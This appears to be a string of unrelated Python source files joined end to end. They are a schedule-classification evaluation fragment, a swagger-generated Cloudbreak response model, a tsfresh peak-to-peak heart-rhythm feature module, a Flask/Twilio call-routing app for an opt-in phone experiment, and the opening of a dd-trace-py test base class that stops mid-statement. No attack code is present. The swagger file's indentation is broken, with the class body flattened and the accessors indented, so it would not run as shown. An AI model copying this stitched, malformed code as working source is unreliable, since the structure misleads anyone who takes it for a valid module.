    with mp.Pool(processes=process_count) as pool:
        results_reference = pool.starmap(classify_load_profile,
            [(neural_model, simulation_model, choose_action_using_reference, time_step_count, sampling_parameters, logger) for i in range(schedule_count_reference)])

    # confusion-matrix summary over all strategies for several schedule prefix
    # lengths; 'positive' = classified feasible by the ANN, ground truth comes
    # from the simulation model
    for evaluation_period in evaluation_periods:
        feasible = [1 if entry['infeasible_at'] >= evaluation_period else 0 for array in [results_arbitrary, results_random, results_reference] for entry in array]
        classified_feasible = [1 if entry['classified_infeasible_at'] >= evaluation_period else 0 for array in [results_arbitrary, results_random, results_reference] for entry in array]
        correctly_classified = sum([truth == result for truth, result in zip(feasible, classified_feasible)])
        true_positive = sum([truth == result for truth, result in zip(feasible, classified_feasible) if truth == 1])
        false_positive = sum([truth != result for truth, result in zip(feasible, classified_feasible) if result == 1])
        true_negative = sum([truth == result for truth, result in zip(feasible, classified_feasible) if truth == 0])
        false_negative = sum([truth != result for truth, result in zip(feasible, classified_feasible) if result == 0])
        logger.info('--- {} time steps ---'.format(evaluation_period))
        logger.info('{} of {} schedules classified correctly'.format(correctly_classified, len(feasible)))
        logger.info('Feasible schedule(s) \t{}'.format(sum(feasible)))
        logger.info('Infeasible schedule(s) \t{}'.format(len(feasible) - sum(feasible)))
        logger.info('True positives \t\t{}'.format(true_positive))
        logger.info('False positives \t{}'.format(false_positive))
        logger.info('True negatives \t\t{}'.format(true_negative))
        logger.info('False negatives \t{}'.format(false_negative))
        logger.info('---')
|
# coding: utf-8
"""
Cloudbreak API
Cloudbreak is a powerful left surf break over a coral reef, a mile southwest of the island of Tavarua, Fiji. Cloudbreak is a cloud agnostic Hadoop as a Service API. It abstracts the provisioning and eases the management and monitoring of on-demand clusters. SequenceIQ's Cloudbreak is a RESTful application development platform with the goal of helping developers to build solutions for deploying Hadoop YARN clusters in different environments. Once it is deployed in your favourite servlet container it exposes a REST API allowing to spin up Hadoop clusters of arbitrary sizes and cloud providers. Provisioning Hadoop has never been easier. Cloudbreak is built on the foundation of cloud providers API (Amazon AWS, Microsoft Azure, Google Cloud Platform, Openstack), Apache Ambari, Docker lightweight containers, Swarm and Consul. For further product documentation follow the link: <a href=\"http://hortonworks.com/apache/cloudbreak/\">http://hortonworks.com/apache/cloudbreak/</a>
OpenAPI spec version: 2.7.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class StructuredParameterQueryResponse(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'property_name': 'str',
'description': 'str',
'default_path': 'str',
'related_service': 'str',
'property_file': 'str',
'protocol': 'str',
'property_display_name': 'str'
}
attribute_map = {
'property_name': 'propertyName',
'description': 'description',
'default_path': 'defaultPath',
'related_service': 'relatedService',
'property_file': 'propertyFile',
'protocol': 'protocol',
'property_display_name': 'propertyDisplayName'
}
def __init__(self, property_name=None, description=None, default_path=None, related_service=None, property_file=None, protocol=None, property_display_name=None):
"""
StructuredParameterQueryResponse - a model defined in Swagger
"""
self._property_name = None
self._description = None
self._default_path = None
self._related_service = None
self._property_file = None
self._protocol = None
self._property_display_name = None
if property_name is not None:
self.property_name = property_name
if description is not None:
self.description = description
if default_path is not None:
self.default_path = default_path
if related_service is not None:
self.related_service = related_service
if property_file is not None:
self.property_file = property_file
if protocol is not None:
self.protocol = protocol
if property_display_name is not None:
self.property_display_name = property_display_name
    # ------------------------------------------------------------------
    # Auto-generated swagger accessors: each getter/setter pair exposes
    # the private `_<name>` attribute populated by __init__. The API
    # schema declares all of these as plain strings (see :rtype: below);
    # a field may be unset if it was never provided — TODO confirm
    # against the generated __init__ defaults.
    # ------------------------------------------------------------------
    @property
    def property_name(self):
        """
        Gets the property_name of this StructuredParameterQueryResponse.

        :return: The property_name of this StructuredParameterQueryResponse.
        :rtype: str
        """
        return self._property_name

    @property_name.setter
    def property_name(self, property_name):
        """
        Sets the property_name of this StructuredParameterQueryResponse.

        :param property_name: The property_name of this StructuredParameterQueryResponse.
        :type: str
        """
        self._property_name = property_name

    @property
    def description(self):
        """
        Gets the description of this StructuredParameterQueryResponse.

        :return: The description of this StructuredParameterQueryResponse.
        :rtype: str
        """
        return self._description

    @description.setter
    def description(self, description):
        """
        Sets the description of this StructuredParameterQueryResponse.

        :param description: The description of this StructuredParameterQueryResponse.
        :type: str
        """
        self._description = description

    @property
    def default_path(self):
        """
        Gets the default_path of this StructuredParameterQueryResponse.

        :return: The default_path of this StructuredParameterQueryResponse.
        :rtype: str
        """
        return self._default_path

    @default_path.setter
    def default_path(self, default_path):
        """
        Sets the default_path of this StructuredParameterQueryResponse.

        :param default_path: The default_path of this StructuredParameterQueryResponse.
        :type: str
        """
        self._default_path = default_path

    @property
    def related_service(self):
        """
        Gets the related_service of this StructuredParameterQueryResponse.

        :return: The related_service of this StructuredParameterQueryResponse.
        :rtype: str
        """
        return self._related_service

    @related_service.setter
    def related_service(self, related_service):
        """
        Sets the related_service of this StructuredParameterQueryResponse.

        :param related_service: The related_service of this StructuredParameterQueryResponse.
        :type: str
        """
        self._related_service = related_service

    @property
    def property_file(self):
        """
        Gets the property_file of this StructuredParameterQueryResponse.

        :return: The property_file of this StructuredParameterQueryResponse.
        :rtype: str
        """
        return self._property_file

    @property_file.setter
    def property_file(self, property_file):
        """
        Sets the property_file of this StructuredParameterQueryResponse.

        :param property_file: The property_file of this StructuredParameterQueryResponse.
        :type: str
        """
        self._property_file = property_file

    @property
    def protocol(self):
        """
        Gets the protocol of this StructuredParameterQueryResponse.

        :return: The protocol of this StructuredParameterQueryResponse.
        :rtype: str
        """
        return self._protocol

    @protocol.setter
    def protocol(self, protocol):
        """
        Sets the protocol of this StructuredParameterQueryResponse.

        :param protocol: The protocol of this StructuredParameterQueryResponse.
        :type: str
        """
        self._protocol = protocol

    @property
    def property_display_name(self):
        """
        Gets the property_display_name of this StructuredParameterQueryResponse.

        :return: The property_display_name of this StructuredParameterQueryResponse.
        :rtype: str
        """
        return self._property_display_name

    @property_display_name.setter
    def property_display_name(self, property_display_name):
        """
        Sets the property_display_name of this StructuredParameterQueryResponse.

        :param property_display_name: The property_display_name of this StructuredParameterQueryResponse.
        :type: str
        """
        self._property_display_name = property_display_name
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, StructuredParameterQueryResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
|
import warnings
import numpy as np
import pandas as pd
from scipy.signal import find_peaks, find_peaks_cwt, ricker
from tsfresh.feature_extraction.feature_calculators import set_property, _roll
from tsfresh.feature_extraction.settings import ComprehensiveFCParameters
from tsfresh.utilities.string_manipulation import convert_to_output_format
"""These functions return various measures of "peak-to-peak" timing.
Peaks could represent, for example, steps in an accelerometer signal,
or pulses on a PPG, where high standard deviation in peak-to-peak
timing could indicate an irregular gait or heart rhythm. tsfresh
already provides a *count* of peaks, but doesn't directly provide any
measure of *variability* in timing between the peaks. This module
adds some measures of variability that are typically used in heart
rhythm analysis."""
############################## Helper functions: ###############################
def get_fc_parameters( features = ['stdev','rmssd','sdsd','nn','pnn'], # TODO: npeaks
                       method_options = ['normal','tsfresh','cwt'],
                       n_options = [1,3,5,10,15,20,25,50],
                       ms_options = [20,50],
                       include_comprehensive_defaults = True):
    """Build a tsfresh settings dict that registers the `ppi` combiner.

    The `n` parameter depends heavily on the sample rate of the signal.
    Therefore, it will likely be beneficial to customize `n_options`
    for your application.

    The default ms_options are typical for HRV measurement; more
    details here: https://dx.doi.org/10.1136/heart.88.4.378
    """
    params = ComprehensiveFCParameters() if include_comprehensive_defaults else {}
    # Split requested features into the *nn family (which take an `ms`
    # threshold) and everything else.
    with_ms = [f for f in features if 'nn' in f]
    without_ms = [f for f in features if 'nn' not in f]
    combos = []
    for f in without_ms:
        for m in method_options:
            for n in n_options:
                combos.append({'feature': f, 'method': m, 'n': n})
    for f in with_ms:
        for m in method_options:
            for n in n_options:
                for ms in ms_options:
                    combos.append({'feature': f, 'method': m, 'n': n, 'ms': ms})
    # TODO: rel_height = [0.25, 0.5, 0.75, 1.0] for 'normal' method
    # TODO: height = [0, None]? 0 might work for a wander-corrected signal.
    # NOTE(review): the key is the `ppi` function object itself, not the
    # string 'ppi'. Stock tsfresh resolves calculators by name via
    # getattr(feature_calculators, name) — confirm the extraction pipeline
    # in use accepts callables as settings keys.
    params[ppi] = combos
    return params
def get_peak_locs(x, method, n, height=None, rel_height=0.5):
    """Find the locations of the peaks in x. x must be a Pandas Series.

    If x.index is a DatetimeIndex (or at least one level is), then the
    returned peak locations will be times. Otherwise, they will be
    integers (i.e. row numbers). Note that in the case where a Series
    has an integer index, the returned integers will represent the
    iloc, not necessarily the loc.

    :param x: the signal to search for peaks
    :type x: pandas.Series
    :param method: peak-detection algorithm: 'normal', 'tsfresh', or 'cwt'
    :type method: str
    :param n: peak width/spacing parameter (meaning depends on method)
    :type n: int
    :param height: minimum peak height; only used by the 'normal' method
    :param rel_height: reserved for width-based detection (currently unused)
    :return: array of peak locations (times or integer positions); empty if none
    :raises TypeError: if x is not a pandas.Series
    :raises ValueError: if method is unrecognized
    """
    # TODO: how to handle missed samples/frames with int index?
    # e.g. if index goes [1, 3, 4, 5, 8, 9, 12] and we find peaks at
    # iloc 2 and 5, we'll think that the distance between them is 3
    # (rows), but really it was 5 (samples). there may be nothing we
    # can do, unless user specifies a "sample #" index level.
    if not isinstance(x, pd.Series):
        # isinstance (rather than a type() comparison) also accepts Series
        # subclasses; include a message so the failure is self-explanatory.
        raise TypeError("x must be a pandas.Series, got %s" % type(x))
    # Find peaks:
    if method == 'normal':
        # this is similar to, but not exactly the same as, the tsfresh
        # `number_peaks` method.
        peak_locs, _ = find_peaks(
            x,
            distance=n,
            height=height,  # probably only useful with baseline wander removed
            # TODO?: prominence:
            # prominence = ... 1? probably depends on signal variance.
            # wlen = ... TODO?
            # TODO?: peak width:
            # width = ... 10?
            # rel_height = rel_height,
        )
        # TODO?: use prominences as features too? e.g. mean
        # prominence? could be a good indicator of recording quality?
    elif method == 'tsfresh':
        # this is the same as the tsfresh `number_peaks` method.
        x_reduced = x[n:-n]
        res = None
        for i in range(1, n + 1):
            result_first = (x_reduced > _roll(x, i)[n:-n])
            if res is None:
                res = result_first
            else:
                res &= result_first
            res &= (x_reduced > _roll(x, -i)[n:-n])
        peak_locs = np.where(res)[0]
    elif method == 'cwt':
        # this is the same as the tsfresh `number_cwt_peaks` method.
        peak_locs = find_peaks_cwt(
            x,
            widths=np.array(list(range(1, n + 1))),
            wavelet=ricker
            # TODO?:
            # max_distances = ...
            # gap_thresh = ...
            # min_length = ...
            # min_snr = ...
            # noise_percf = ...
            # window_size = ...
        )
    else:
        raise ValueError("method must be 'normal', 'tsfresh', or 'cwt'.")
    # Look for a DatetimeIndex:
    dt_level_name = None
    if isinstance(x.index, pd.MultiIndex):
        for level in x.index.levels:
            if isinstance(level, pd.DatetimeIndex):
                dt_level_name = level.name
                break
    elif isinstance(x.index, pd.DatetimeIndex):
        dt_level_name = x.index.name
    # Convert peak locations to times, if we can:
    if len(peak_locs) == 0:
        warnings.warn("Couldn't find any peaks in signal.")
        return np.array([])
    if dt_level_name is not None:
        peak_loc_times = x.index.get_level_values(dt_level_name)[peak_locs]
    else:
        # just keep the integer indexing
        peak_loc_times = peak_locs
    return peak_loc_times
def peaklocs_to_ppis(peak_locs):
    """Convert peak locations into successive peak-to-peak intervals.

    ``peak_locs`` is a 1D array/series of peak locations, either times
    (yielding timedeltas) or integer sample positions (yielding sample
    counts). Fewer than two peaks yields an empty array, since no
    interval can be formed.
    """
    if len(peak_locs) < 2:
        return np.array([])
    # Difference between each peak location and its predecessor.
    return peak_locs[1:] - peak_locs[:-1]
######################### Combined feature calculator: #########################
@set_property("fctype", "combiner")
@set_property("input", "pd.Series")
def ppi(x, param):
    """
    Calculates various peak-to-peak interval statistics, like RMSSD and pNN.

    This function uses the given parameters (`method` and `n`) to
    detect the peaks in x. It then returns standard deviation, RMSSD,
    SDSD, NN, and PNN based on the peak-to-peak intervals (PPIs) it
    found. These features are typically used to characterize cardiac
    arrhythmias.

    :param x: the time series to calculate the feature of
    :type x: pandas.Series
    :param param: contains dictionaries {'feature': f, 'method': m,
                  'n': n, 'ms': ms} with f str e.g. 'rmssd', m str
                  e.g. 'cwt', n int, ms int/float
    :type param: list
    :return: list of tuples (s, f) where s are the parameters, serialized as a string,
             and f the respective feature value as int or float
    :return type: pandas.Series
    """
    # Dispatch table: feature name -> calculator function defined below.
    function_map = {
        'stdev': ppi_stdev,
        'rmssd': ppi_rmssd,
        'sdsd': ppi_sdsd,
        'nn': ppi_nn,
        'pnn': ppi_pnn,
        # TODO: ppi_npeaks
    }
    res = {}
    # Find the unique sets of parameters (method, n). For each one of
    # them, we only need to find the peaks once.
    params_df = pd.DataFrame(param)
    unique_params = params_df[['method','n']].drop_duplicates()
    unique_params_dicts = unique_params.T.to_dict()
    for k, params in unique_params_dicts.items():
        # Expensive step: peak detection, done once per unique (method, n).
        peak_locs = get_peak_locs(x, method=params['method'], n=params['n'])
        ppis = peaklocs_to_ppis(peak_locs) # TODO: only if some features need it?
        # Now that we know the peak locations based on this set of
        # params, we can compute all the PPI features.
        for idx, row in params_df.iterrows():
            if row['method'] == params['method'] and row['n'] == params['n']:
                # Serialized parameter string becomes the tsfresh feature name.
                output_key = convert_to_output_format(row)
                # Non-*nn features receive ms=None (or NaN, once mixed rows give
                # the DataFrame an 'ms' column) and ignore it via **kwargs.
                result = function_map[row['feature']](
                    x = x,
                    method = row['method'],
                    n = row['n'],
                    ms = row['ms'] if 'ms' in row else None,
                    peak_locs = peak_locs,
                    ppis = ppis,
                )
                res[output_key] = result
    return [(key, value) for key, value in res.items()]
####################### Individual feature calculators: ########################
@set_property("fctype", "simple")
@set_property("input", "pd.Series")
def ppi_npeaks(x, method, n, peak_locs=None, **kwargs):
    """
    Number of peaks.

    :param x: the time series to calculate the feature of
    :type x: pandas.Series
    :param method: how to find peaks ('cwt' or 'normal')
    :type method: string
    :param n: peak width parameter
    :type n: int
    :param peak_locs: precomputed peak locations (skips re-detection)
    :return: the value of this feature, or NaN if peak detection failed
    :return type: int
    """
    # TODO: this is not useful yet, because tsfresh already computes
    # this. but adding more parameters will make it different.
    if peak_locs is None:
        try:
            peak_locs = get_peak_locs(x, method, n)
        except Exception:
            # Peak detection failed; report NaN rather than aborting the whole
            # extraction. (The previous bare `except:` would also have
            # swallowed KeyboardInterrupt/SystemExit.)
            return np.nan
    return len(peak_locs)
@set_property("fctype", "simple")
@set_property("input", "pd.Series")
def ppi_stdev(x, method, n, peak_locs=None, ppis=None, **kwargs):
    """
    Standard deviation in peak-to-peak intervals.

    :param x: the time series to calculate the feature of
    :type x: pandas.Series
    :param method: how to find peaks ('cwt' or 'normal')
    :type method: string
    :param n: peak width parameter
    :type n: int
    :param peak_locs: precomputed peak locations (skips re-detection)
    :param ppis: precomputed peak-to-peak intervals (skips recomputation)
    :return: the value of this feature, or NaN if too few peaks were found
    :return type: float
    """
    if ppis is None:
        if peak_locs is None:
            try:
                peak_locs = get_peak_locs(x, method, n)
            except Exception:
                # Peak detection failed; yield NaN instead of aborting the
                # extraction. (A bare `except:` would also have swallowed
                # KeyboardInterrupt/SystemExit.)
                return np.nan
        if len(peak_locs) < 3:
            # Fewer than 3 peaks gives fewer than 2 intervals: no spread.
            return np.nan
        ppis = peaklocs_to_ppis(peak_locs)
    if isinstance(ppis, pd.TimedeltaIndex):
        # Time-based intervals: work in (float) seconds.
        ppis = ppis.total_seconds()
    # Population standard deviation (np.std default ddof=0).
    return np.std(ppis)
@set_property("fctype", "simple")
@set_property("input", "pd.Series")
def ppi_rmssd(x, method, n, peak_locs=None, ppis=None, **kwargs):
    """
    Root mean square of successive differences between adjacent peak-to-peak intervals.

    :param x: the time series to calculate the feature of
    :type x: pandas.Series
    :param method: how to find peaks ('cwt' or 'normal')
    :type method: string
    :param n: peak width parameter
    :type n: int
    :param peak_locs: precomputed peak locations (skips re-detection)
    :param ppis: precomputed peak-to-peak intervals (skips recomputation)
    :return: the value of this feature, or NaN if too few peaks were found
    :return type: float
    """
    if ppis is None:
        if peak_locs is None:
            try:
                peak_locs = get_peak_locs(x, method, n)
            except Exception:
                # Peak detection failed; yield NaN instead of aborting the
                # extraction. (A bare `except:` would also have swallowed
                # KeyboardInterrupt/SystemExit.)
                return np.nan
        if len(peak_locs) < 3:
            # Need at least 2 intervals to form a successive difference.
            return np.nan
        ppis = peaklocs_to_ppis(peak_locs)
    if isinstance(ppis, pd.TimedeltaIndex):
        # Time-based intervals: work in (float) seconds.
        ppis = ppis.total_seconds()
    differences = ppis[1:] - ppis[:-1]
    diff_sq = differences ** 2
    mean_diff_sq = np.mean(diff_sq)
    return mean_diff_sq ** 0.5
@set_property("fctype", "simple")
@set_property("input", "pd.Series")
def ppi_sdsd(x, method, n, peak_locs=None, ppis=None, **kwargs):
    """
    Standard deviation of the successive differences between adjacent peak-to-peak intervals.

    :param x: the time series to calculate the feature of
    :type x: pandas.Series
    :param method: how to find peaks ('cwt' or 'normal')
    :type method: string
    :param n: peak width parameter
    :type n: int
    :param peak_locs: precomputed peak locations (skips re-detection)
    :param ppis: precomputed peak-to-peak intervals (skips recomputation)
    :return: the value of this feature, or NaN if too few peaks were found
    :return type: float
    """
    if ppis is None:
        if peak_locs is None:
            try:
                peak_locs = get_peak_locs(x, method, n)
            except Exception:
                # Peak detection failed; yield NaN instead of aborting the
                # extraction. (A bare `except:` would also have swallowed
                # KeyboardInterrupt/SystemExit.)
                return np.nan
        if len(peak_locs) < 3:
            # Need at least 2 intervals to form a successive difference.
            return np.nan
        ppis = peaklocs_to_ppis(peak_locs)
    if isinstance(ppis, pd.TimedeltaIndex):
        # Time-based intervals: work in (float) seconds.
        ppis = ppis.total_seconds()
    differences = ppis[1:] - ppis[:-1]
    return np.std(differences)
@set_property("fctype", "simple")
@set_property("input", "pd.Series")
def ppi_nn(x, method, n, ms, peak_locs=None, ppis=None, **kwargs):
    """The number of pairs of successive peak-to-peak intervals that
    differ by more than `ms` ms in the case of a DatetimeIndex, or by
    `ms` samples otherwise.

    :param x: the time series to calculate the feature of
    :type x: pandas.Series
    :param method: how to find peaks ('cwt' or 'normal')
    :type method: string
    :param n: peak width parameter
    :type n: int
    :param ms: minimum difference in successive peak-to-peak intervals
    :type ms: float
    :param peak_locs: precomputed peak locations (skips re-detection)
    :param ppis: precomputed peak-to-peak intervals (skips recomputation)
    :return: the value of this feature, or NaN if too few peaks were found
    :return type: int
    """
    if ppis is None:
        if peak_locs is None:
            try:
                peak_locs = get_peak_locs(x, method, n)
            except Exception:
                # Peak detection failed; yield NaN instead of aborting the
                # extraction. (A bare `except:` would also have swallowed
                # KeyboardInterrupt/SystemExit.)
                return np.nan
        if len(peak_locs) < 3:
            # Need at least 2 intervals to form a successive difference.
            return np.nan
        ppis = peaklocs_to_ppis(peak_locs)
    if isinstance(ppis, pd.TimedeltaIndex):
        # Time-based intervals: compare in seconds, so convert the
        # millisecond threshold accordingly.
        ppis = ppis.total_seconds()
        ms = ms / 1000.0
    differences = ppis[1:] - ppis[:-1]
    count = np.sum(abs(differences) > ms)
    return count
@set_property("fctype", "simple")
@set_property("input", "pd.Series")
def ppi_pnn(x, method, n, ms, peak_locs=None, ppis=None, **kwargs):
    """
    The proportion of nn(peak_locs, ms) divided by total number of peak-to-peak intervals.

    :param x: the time series to calculate the feature of
    :type x: pandas.Series
    :param method: how to find peaks ('cwt' or 'normal')
    :type method: string
    :param n: peak width parameter
    :type n: int
    :param ms: minimum difference in successive peak-to-peak intervals, ms
    :type ms: float
    :param peak_locs: precomputed peak locations (skips re-detection)
    :param ppis: precomputed peak-to-peak intervals (skips recomputation)
    :return: the value of this feature, or NaN if too few peaks were found
    :return type: float
    """
    if ppis is None:
        if peak_locs is None:
            try:
                peak_locs = get_peak_locs(x, method, n)
            except Exception:
                # Peak detection failed; yield NaN instead of aborting the
                # extraction. (A bare `except:` would also have swallowed
                # KeyboardInterrupt/SystemExit.)
                return np.nan
        if len(peak_locs) < 3:
            return np.nan
        ppis = peaklocs_to_ppis(peak_locs)
    if len(ppis) < 1:
        # Avoid division by zero below.
        return np.nan
    # ppi_nn performs the TimedeltaIndex -> seconds conversion itself.
    over = ppi_nn(x, method, n, ms, ppis=ppis)
    return float(over) / len(ppis)
# TODO: don't keep repeating boilerplate stuff in each feature calculator
################################################################################
# TODO: more metrics from https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5422439/
# and https://www.ahajournals.org/doi/10.1161/01.CIR.93.5.1043
# and https://doi.org/10.1152/ajpheart.00421.2020, which is update to first one?
|
# calls/views/weirdness.py
import random
from flask import (
Blueprint,
current_app as app,
redirect,
request,
)
from calls import constants
from calls.models import (
db,
Submission,
Volunteer,
UserCodeConfig,
)
from calls.utils import (
get_gather_times,
parse_sip_address,
protected,
protected_external_url,
render_xml,
sanitize_phone_number,
)
# Blueprint grouping the "weirdness" call/SMS webhook endpoints under /weirdness.
weirdness = Blueprint('weirdness', __name__, url_prefix='/weirdness')
@weirdness.route('/outgoing', methods=('POST',))
@protected
def outgoing():
    """Webhook for outgoing weirdness calls.

    Invoked both when a call starts and again as the dial action callback
    (DialCallStatus/DialCallDuration present) after a dialed party hangs up.
    Returns TwiML rendered from the templates.
    """
    # We can come from the broadcast outgoing route, where we may want to change behaviour
    is_broadcast = parse_sip_address(
        request.values.get('From')) == app.config['BROADCAST_SIP_USERNAME']
    # If our submit action on the dialed call comes back with status completed,
    # that means the dialed party hung up. If this happens in the first 30 secs,
    # we'll dial someone else -- otherwise let's hang up on the caller
    # (the -1 default means a missing DialCallDuration never counts as >= 30).
    if (
        request.values.get('DialCallStatus') == 'completed'
        and int(request.values.get('DialCallDuration', -1)) >= 30
    ):
        context = {}
        if not is_broadcast:
            context = {
                'message': ('Congratulations! You have won! You will receive a FREE '
                            'Microsoft Zune in 3 to 5 business days.'),
                'with_song': True,
            }
        app.logger.info('Outgoing weirdness call completed')
        return render_xml('hang_up.xml', **context)
    else:
        # 1 in 30 chance we're calling the BMIR broadcast phone (unless this
        # call came routed from the broadcast desk)
        if (
            not is_broadcast
            # Make sure this wasn't an outside caller who won the lottery
            and not request.values.get('To') == app.config['BROADCAST_NUMBER']
            and random.randint(1, constants.WEIRDNESS_RANDOM_CHANCE_OF_RINGING_BROADCAST) == 1
            and UserCodeConfig.get('random_weirdness_to_broadcast')
        ):
            app.logger.info('Outgoing weirdness call won lottery, dialing broadcast phone')
            return render_xml(
                'call.xml',
                timeout=20,
                record=True,
                from_number=app.config['WEIRDNESS_NUMBER'],
                action_url=protected_external_url('weirdness.outgoing'),
                to_sip_address='{}@{}'.format(
                    app.config['BROADCAST_SIP_USERNAME'],
                    app.config['TWILIO_SIP_DOMAIN'],
                ))
        # Otherwise it's a new call OR the person we called didn't confirm.
        multiring = UserCodeConfig.get('weirdness_multiring')
        volunteers = Volunteer.get_random_opted_in(multiring=multiring)
        if volunteers:
            to_numbers = [volunteer.phone_number for volunteer in volunteers]
            app.logger.info('Outgoing weirdness call to {}'.format(
                to_numbers[0] if len(to_numbers) == 1 else to_numbers
            ))
            # Dial the selected volunteer(s); the whisper endpoint asks the
            # answering party to confirm before the call is bridged.
            return render_xml(
                'call.xml',
                record=True,
                timeout=20,
                from_number=app.config['WEIRDNESS_NUMBER'],
                to_numbers=to_numbers,
                action_url=protected_external_url('weirdness.outgoing'),
                whisper_url=protected_external_url('weirdness.whisper'),
            )
        else:
            app.logger.info('Outgoing weirdness call found no volunteers. Hanging up.')
            return render_xml(
                'hang_up.xml',
                message='You lose. Thanks for playing! Better luck next time!',
                with_song=True,
            )
@weirdness.route('/whisper', methods=('POST',))
@protected
def whisper():
    """Whisper prompt played to the answering party before bridging the call.

    `Digits` being present means the listener pressed a key to confirm;
    the `has_gathered` query arg tracks whether a gather already happened.
    """
    is_confirmed = bool(request.values.get('Digits'))
    was_gathered = bool(request.args.get('has_gathered'))
    app.logger.info('Whispering to {} (confirmed = {}, gathered = {})'.format(
        request.values.get('To'), is_confirmed, was_gathered))
    repeat_url = protected_external_url('weirdness.whisper', has_gathered='y')
    return render_xml(
        'whisper.xml',
        confirmed=is_confirmed,
        has_gathered=was_gathered,
        action_url=repeat_url,
    )
@weirdness.route('/incoming', methods=('POST',))
@protected
def incoming():
    """Webhook for calls placed to the weirdness number.

    New callers who press 1 are enrolled as volunteers; existing volunteers
    who press 1 get a two-step removal flow (press 1, then confirm on the
    next round trip via the `confirm` query arg).
    """
    from_number = sanitize_phone_number(request.values.get('From'))
    if not from_number:
        # Can't enroll or call back a blocked caller ID.
        app.logger.info('Incoming weirdness with caller ID blocked')
        return render_xml(
            'hang_up.xml',
            message='Call with your caller ID unblocked to get through. Goodbye!')
    enrolled = confirm = False
    volunteer = Volunteer.query.filter_by(phone_number=from_number).first()
    if volunteer:
        enrolled = True
    gather_times = get_gather_times()
    url_kwargs = {'gather': gather_times}
    if request.values.get('Digits') == '1':
        # Caller pressed 1 in the menu.
        if volunteer:
            if request.args.get('confirm'):
                # Second press (confirmation round): actually remove them.
                db.session.delete(volunteer)
                db.session.commit()
                app.logger.info('Volunteer {} removed by call'.format(from_number))
                return render_xml(
                    'hang_up.xml', with_song=True,
                    message=('You will no longer receive calls. To sign back up, '
                             'call this number or go to calls dot B M I R dot org.'))
            else:
                # First press: re-render the menu asking for confirmation.
                confirm = True
                url_kwargs['confirm'] = 'y'
                del url_kwargs['gather']
        else:
            # Unknown caller pressed 1: record a submission and hand off to
            # the volunteer verification flow.
            submission = Submission(phone_number=from_number)
            db.session.add(submission)
            db.session.commit()
            app.logger.info('Volunteer {} added by call'.format(from_number))
            return redirect(protected_external_url(
                'volunteers.verify', id=submission.id, phoned='y'))
    app.logger.info('Got incoming weirdness call from {} (enrolled = {})'.format(
        from_number, enrolled))
    return render_xml(
        'incoming_weirdness.xml',
        action_url=protected_external_url('weirdness.incoming', **url_kwargs),
        confirm=confirm,
        enrolled=enrolled,
        gather_times=gather_times,
    )
@weirdness.route('/sms', methods=('POST',))
@protected
def sms():
    """Webhook for incoming SMS: "GO AWAY" unsubscribes, "SIGN UP" enrolls."""
    from_number = sanitize_phone_number(request.values.get('From'))
    # Normalize whitespace and case so phrase matching is forgiving.
    incoming_message = ' '.join(request.values.get('Body', '').lower().split())
    volunteer = Volunteer.query.filter_by(phone_number=from_number).first()
    if volunteer:
        if any(phrase in incoming_message for phrase in ('go away', 'goaway')):
            db.session.delete(volunteer)
            db.session.commit()
            app.logger.info('Volunteer {} removed by sms'.format(from_number))
            # BUG FIX: a stray comma previously made this a 2-tuple of strings
            # instead of one implicitly-concatenated message string.
            message = ('You will no longer receive calls from the BMIR Phone Experiment. '
                       'To sign back up, go to https://calls.bmir.org/ or text "SIGN UP".')
        else:
            app.logger.info('Got sms from {}'.format(from_number))
            message = ('Text "GO AWAY" to stop receiving calls from the BMIR '
                       'Phone Experiment.')
    else:
        if from_number:
            if any(phrase in incoming_message for phrase in ('sign up', 'signup')):
                submission = Submission(phone_number=from_number)
                db.session.add(submission)
                db.session.commit()
                submission.create_volunteer()
                app.logger.info('Volunteer {} added by sms'.format(from_number))
                # BUG FIX: same stray-comma tuple here; also fixed the
                # "get a called" typo.
                message = ('You have signed up for the BMIR Phone Experiment! '
                           'Text "GO AWAY" to stop receiving calls. '
                           'NOTE: you could get called 24 hours a day. To select '
                           'times of day to receive calls, go to https://calls.bmir.org/')
            else:
                app.logger.info('Got sms from {}'.format(from_number))
                # Typo fix: "go to to" -> "go to".
                message = ('Text "SIGN UP" or go to https://calls.bmir.org/ '
                           'to sign up for the BMIR Phone Experiment.')
        else:
            message = 'Go to https://calls.bmir.org/ to sign up for BMIR Phone Experiment.'
    return render_xml('sms.xml', message=message)
|
# jdost/dd-trace-py
import contextlib
import os
import sys
import unittest
import ddtrace
from ..utils.tracer import DummyTracer
from ..utils.span import TestSpanContainer, TestSpan, NO_CHILDREN
class BaseTestCase(unittest.TestCase):
    """
    Extends ``unittest.TestCase`` with context-manager helpers for temporarily
    overriding environment variables, tracer configuration, and ``sys.modules``.

    Example::

        from tests import BaseTestCase

        class MyTestCase(BaseTestCase):
            def test_case(self):
                with self.override_config('flask', dict(distributed_tracing_enabled=True)):
                    pass
    """
    @staticmethod
    @contextlib.contextmanager
    def override_env(env):
        """
        Temporarily layer the provided values on top of ``os.environ``

        >>> with self.override_env(dict(DATADOG_TRACE_DEBUG=True)):
            # Your test
        """
        snapshot = dict(os.environ)
        os.environ.update(env)
        try:
            yield
        finally:
            # Restore exactly the original environment, dropping any additions.
            os.environ.clear()
            os.environ.update(snapshot)

    @staticmethod
    @contextlib.contextmanager
    def override_global_config(values):
        """
        Temporarily override the global tracer configuration

        >>> with self.override_global_config(dict(name=value,...)):
            # Your test
        """
        # DEV: dict-style interface, but stored as attributes on the Config instance
        previous = dict(
